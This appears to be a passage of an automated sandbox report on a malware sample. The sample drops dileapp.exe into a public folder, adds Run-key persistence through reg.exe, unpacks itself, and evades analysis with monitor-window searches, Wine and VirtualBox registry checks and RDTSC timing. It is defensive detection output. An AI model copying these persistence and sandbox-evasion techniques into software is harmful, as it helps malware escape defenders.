                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: file.exeStatic file information: File size 2210104 > 1048576
                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: file.exe
                Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\Public\Netstat\dileapp.exeUnpacked PE file: 5.2.dileapp.exe.fd0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fngpdisv:EW;tvvnknfw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fngpdisv:EW;tvvnknfw:EW;.taggant:EW;
                Source: C:\Users\Public\Netstat\dileapp.exeUnpacked PE file: 9.2.dileapp.exe.fd0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fngpdisv:EW;tvvnknfw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fngpdisv:EW;tvvnknfw:EW;.taggant:EW;
                Source: C:\Users\Public\Netstat\dileapp.exeUnpacked PE file: 12.2.dileapp.exe.fd0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fngpdisv:EW;tvvnknfw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fngpdisv:EW;tvvnknfw:EW;.taggant:EW;
                Source: C:\Users\Public\Netstat\dileapp.exeUnpacked PE file: 15.2.dileapp.exe.fd0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fngpdisv:EW;tvvnknfw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fngpdisv:EW;tvvnknfw:EW;.taggant:EW;
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Netstat\__tmp_rar_sfx_access_check_5902140Jump to behavior
                Source: dileapp.exe.0.drStatic PE information: real checksum: 0x1d95c5 should be: 0x1deca8
                Source: file.exeStatic PE information: real checksum: 0x0 should be: 0x224cb2
                Source: dileapp.exe.0.drStatic PE information: section name:
                Source: dileapp.exe.0.drStatic PE information: section name: .idata
                Source: dileapp.exe.0.drStatic PE information: section name:
                Source: dileapp.exe.0.drStatic PE information: section name: fngpdisv
                Source: dileapp.exe.0.drStatic PE information: section name: tvvnknfw
                Source: dileapp.exe.0.drStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007AD8B6 push ecx; ret 0_2_007AD8C9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007ACDF0 push eax; ret 0_2_007ACE0E
                Source: dileapp.exe.0.drStatic PE information: section name: entropy: 7.978907373562353
                Source: dileapp.exe.0.drStatic PE information: section name: fngpdisv entropy: 7.954644533693645

                Persistence and Installation Behavior

                barindex
                Uses cmd line tools excessively to alter registry or file data
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Netstat\dileapp.exeJump to dropped file

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\Public\Netstat\dileapp.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetstatJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetstatJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run NetstatJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run NetstatJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Query firmware table information (likely to detect VMs)
                Source: C:\Users\Public\Netstat\dileapp.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeSystem information queried: FirmwareTableInformationJump to behavior
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1029288 second address: 102929F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FCCB0D02D08h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jne 00007FCCB0D02D06h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B31B9 second address: 11B31BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B331F second address: 11B3328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B3328 second address: 11B332C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B332C second address: 11B334B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007FCCB0D02D06h 0x00000011 jmp 00007FCCB0D02D0Eh 0x00000016 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B334B second address: 11B334F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B334F second address: 11B3355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B3355 second address: 11B335B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B3497 second address: 11B34DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB0D02D16h 0x00000007 jmp 00007FCCB0D02D12h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FCCB0D02D15h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B34DD second address: 11B34E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B34E1 second address: 11B3504 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB0D02D17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007FCCB0D02D06h 0x00000011 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B3504 second address: 11B352D instructions: 0x00000000 rdtsc 0x00000002 jo 00007FCCB120DFD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007FCCB120DFDEh 0x00000010 pushad 0x00000011 popad 0x00000012 jp 00007FCCB120DFD6h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FCCB120DFDFh 0x0000001f rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B352D second address: 11B3531 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B3AA6 second address: 11B3AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FCCB120DFD6h 0x0000000a jmp 00007FCCB120DFDDh 0x0000000f jo 00007FCCB120DFE2h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B3AC5 second address: 11B3ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B3ACB second address: 11B3AE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 ja 00007FCCB120DFD6h 0x0000000c jmp 00007FCCB120DFE0h 0x00000011 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B71A4 second address: 11B71A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B71A8 second address: 11B71AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B71AE second address: 11B71B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B71B3 second address: 11B71C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B71C5 second address: 11B71F0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FCCB0D02D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop esi 0x0000000e popad 0x0000000f mov eax, dword ptr [eax] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push esi 0x00000015 pop esi 0x00000016 jmp 00007FCCB0D02D14h 0x0000001b popad 0x0000001c rdtsc
